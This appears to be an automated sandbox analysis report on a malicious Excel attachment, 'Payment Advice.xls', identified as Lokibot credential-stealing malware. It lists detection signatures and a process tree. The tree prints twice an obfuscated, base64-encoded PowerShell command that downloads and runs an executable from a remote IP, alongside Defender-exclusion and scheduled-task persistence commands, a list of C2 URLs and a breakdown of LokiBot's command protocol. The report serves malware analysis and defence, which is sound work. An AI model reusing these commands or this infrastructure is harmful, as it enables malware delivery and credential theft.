Edit tour
Windows
Analysis Report
Payment Advice.xls
Overview
General Information
Detection
HTMLPhisher, Lokibot
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Lokibot
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Microsoft Office drops suspicious files
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches the installation path of Mozilla Firefox
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w7x64
- EXCEL.EXE (PID: 3192 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Offic e14\EXCEL. EXE" /auto mation -Em bedding MD5: D53B85E21886D2AF9815C377537BCAC3) - mshta.exe (PID: 3492 cmdline:
C:\Windows \System32\ mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5) - powershell.exe (PID: 3580 cmdline:
"C:\Window s\sYStem32 \wInDOwSPO weRsheLl\v 1.0\pOweRS helL.EXe" "PoWeRSheL L.ExE -EX bYpAss -nOP -W 1 -c DeViCecR eDenTIaldE pLOyment ; iEx($(i EX('[Syste M.TExT.enc ODInG]'+[c HAR]58+[cH AR]58+'UTF 8.GEtSTrIN g([sysTem. cOnVERT]'+ [cHAR]58+[ chAr]58+'F rOMbASe64S trIng('+[c hAR]34+'JG 56dWNGVUF3 ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgPSAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIE FEZC10WVBF ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgLU1lbW JlUkRFRklO aVRpT04gIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AnW0RsbElt cG9ydCgidX JsbU9OIiwg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICBDaGFyU2 V0ID0gQ2hh clNldC5Vbm ljb2RlKV1w dWJsaWMgc3 RhdGljIGV4 dGVybiBJbn RQdHIgVVJM RG93bmxvYW RUb0ZpbGUo SW50UHRyIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgWlBudFZz UmhBaCxzdH JpbmcgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBN eWpwcUlrUX dEYixzdHJp bmcgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICB1al FRcFNYb0lX eSx1aW50IC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgTSxJbnRQ dHIgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICBhWX lwdmx5a3Bl KTsnICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgLU 5BbUUgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAi ZFhHTSIgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AtbmFNRVNw YUNlICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgV1 BmVyAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIC1Q YXNzVGhydT sgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAkbnp1 Y0ZVQXc6Ol VSTERvd25s b2FkVG9GaW xlKDAsImh0 dHA6Ly8xOT IuMy4yNDMu MTM2LzU1L2 Nhc3BvbC5l eGUiLCIkZU 52OkFQUERB VEFcY2FzcG 9sLmV4ZSIs MCwwKTtzVG FyVC1TbGVl UCgzKTtpZX ggICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAiJEVO VjpBUFBEQV RBXGNhc3Bv bC5leGUi'+ [cHaR]0X22 +'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - powershell.exe (PID: 3680 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -EX bYpAss -nOP -W 1 -c DeViCe cReDenTIal dEpLOyment MD5: A575A7610E5F003CC36DF39E07C4BA7D) - csc.exe (PID: 3792 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\i4ik0b io\i4ik0bi o.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1) - cvtres.exe (PID: 3800 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES37A5.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\i4i k0bio\CSCA 15BDDDB436 4D65A64579 3B6780D1C5 .TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - caspol.exe (PID: 3888 cmdline:
"C:\Users\ user\AppDa ta\Roaming \caspol.ex e" MD5: 74061922F1E78C237A66D12A15A18181) - powershell.exe (PID: 3948 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Add-MpPref erence -Ex clusionPat h "C:\User s\user\App Data\Roami ng\caspol. exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8) - powershell.exe (PID: 3980 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Add-MpPref erence -Ex clusionPat h "C:\User s\user\App Data\Roami ng\rrwscqk DSNwLK.exe " MD5: EB32C070E658937AA9FA9F3AE629B2B8) - schtasks.exe (PID: 4056 cmdline:
"C:\Window s\System32 \schtasks. exe" /Crea te /TN "Up dates\rrws cqkDSNwLK" /XML "C:\ Users\user \AppData\L ocal\Temp\ tmpAAE0.tm p" MD5: 2003E9B15E1C502B146DAD2E383AC1E3) - caspol.exe (PID: 2596 cmdline:
"C:\Users\ user\AppDa ta\Roaming \caspol.ex e" MD5: 74061922F1E78C237A66D12A15A18181) - AcroRd32.exe (PID: 2780 cmdline:
"C:\Progra m Files (x 86)\Adobe\ Acrobat Re ader DC\Re ader\AcroR d32.exe" - Embedding MD5: 2F8D93826B8CBF9290BC57535C7A6817) - mshta.exe (PID: 3424 cmdline:
C:\Windows \System32\ mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5) - powershell.exe (PID: 3860 cmdline:
"C:\Window s\sYStem32 \wInDOwSPO weRsheLl\v 1.0\pOweRS helL.EXe" "PoWeRSheL L.ExE -EX bYpAss -nOP -W 1 -c DeViCecR eDenTIaldE pLOyment ; iEx($(i EX('[Syste M.TExT.enc ODInG]'+[c HAR]58+[cH AR]58+'UTF 8.GEtSTrIN g([sysTem. cOnVERT]'+ [cHAR]58+[ chAr]58+'F rOMbASe64S trIng('+[c hAR]34+'JG 56dWNGVUF3 ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgPSAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIE FEZC10WVBF ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgLU1lbW JlUkRFRklO aVRpT04gIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AnW0RsbElt cG9ydCgidX JsbU9OIiwg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICBDaGFyU2 V0ID0gQ2hh clNldC5Vbm ljb2RlKV1w dWJsaWMgc3 RhdGljIGV4 dGVybiBJbn RQdHIgVVJM RG93bmxvYW RUb0ZpbGUo SW50UHRyIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgWlBudFZz UmhBaCxzdH JpbmcgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBN eWpwcUlrUX dEYixzdHJp bmcgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICB1al FRcFNYb0lX eSx1aW50IC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgTSxJbnRQ dHIgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICBhWX lwdmx5a3Bl KTsnICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgLU 5BbUUgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAi ZFhHTSIgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AtbmFNRVNw YUNlICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgV1 BmVyAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIC1Q YXNzVGhydT sgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAkbnp1 Y0ZVQXc6Ol VSTERvd25s b2FkVG9GaW xlKDAsImh0 dHA6Ly8xOT IuMy4yNDMu MTM2LzU1L2 Nhc3BvbC5l eGUiLCIkZU 52OkFQUERB VEFcY2FzcG 9sLmV4ZSIs MCwwKTtzVG FyVC1TbGVl UCgzKTtpZX ggICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAiJEVO VjpBUFBEQV RBXGNhc3Bv bC5leGUi'+ [cHaR]0X22 +'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - powershell.exe (PID: 1688 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -EX bYpAss -nOP -W 1 -c DeViCe cReDenTIal dEpLOyment MD5: A575A7610E5F003CC36DF39E07C4BA7D) - csc.exe (PID: 4092 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\zpwvvp vf\zpwvvpv f.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1) - cvtres.exe (PID: 3016 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESB0AA.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\zpw vvpvf\CSC3 1AA5FCDA54 445E088EDA 110AE3BEBC 4.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - caspol.exe (PID: 4076 cmdline:
"C:\Users\ user\AppDa ta\Roaming \caspol.ex e" MD5: 74061922F1E78C237A66D12A15A18181) - powershell.exe (PID: 2456 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Add-MpPref erence -Ex clusionPat h "C:\User s\user\App Data\Roami ng\caspol. exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8) - powershell.exe (PID: 2524 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Add-MpPref erence -Ex clusionPat h "C:\User s\user\App Data\Roami ng\rrwscqk DSNwLK.exe " MD5: EB32C070E658937AA9FA9F3AE629B2B8) - schtasks.exe (PID: 4028 cmdline:
"C:\Window s\System32 \schtasks. exe" /Crea te /TN "Up dates\rrws cqkDSNwLK" /XML "C:\ Users\user \AppData\L ocal\Temp\ tmp1F44.tm p" MD5: 2003E9B15E1C502B146DAD2E383AC1E3) - caspol.exe (PID: 3600 cmdline:
"C:\Users\ user\AppDa ta\Roaming \caspol.ex e" MD5: 74061922F1E78C237A66D12A15A18181)
- taskeng.exe (PID: 1976 cmdline:
taskeng.ex e {819EB82 4-4817-404 8-BBF5-A7A 0A0C35676} S-1-5-21- 966771315- 3019405637 -367336477 -1006:user -PC\user:I nteractive :[1] MD5: 65EA57712340C09B1B0C427B4848AE05) - rrwscqkDSNwLK.exe (PID: 1644 cmdline:
C:\Users\u ser\AppDat a\Roaming\ rrwscqkDSN wLK.exe MD5: 74061922F1E78C237A66D12A15A18181) - powershell.exe (PID: 956 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Add-MpPref erence -Ex clusionPat h "C:\User s\user\App Data\Roami ng\rrwscqk DSNwLK.exe " MD5: EB32C070E658937AA9FA9F3AE629B2B8) - powershell.exe (PID: 1944 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Add-MpPref erence -Ex clusionPat h "C:\User s\user\App Data\Roami ng\rrwscqk DSNwLK.exe " MD5: EB32C070E658937AA9FA9F3AE629B2B8) - schtasks.exe (PID: 3232 cmdline:
"C:\Window s\System32 \schtasks. exe" /Crea te /TN "Up dates\rrws cqkDSNwLK" /XML "C:\ Users\user \AppData\L ocal\Temp\ tmpDCB9.tm p" MD5: 2003E9B15E1C502B146DAD2E383AC1E3) - rrwscqkDSNwLK.exe (PID: 3576 cmdline:
"C:\Users\ user\AppDa ta\Roaming \rrwscqkDS NwLK.exe" MD5: 74061922F1E78C237A66D12A15A18181)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Loki Password Stealer (PWS), LokiBot | "Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2 |
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.41/simple/five/fre.php"]}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_HtmlPhish_44 | Yara detected HtmlPhish_44 | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security | ||
JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security | ||
JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
Windows_Trojan_Lokibot_1f885282 | unknown | unknown |
| |
Click to see the 47 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security | ||
JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
Windows_Trojan_Lokibot_1f885282 | unknown | unknown |
| |
Windows_Trojan_Lokibot_0f421617 | unknown | unknown |
| |
Click to see the 37 entries |
System Summary |
---|
Source: | Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Michael Haag: |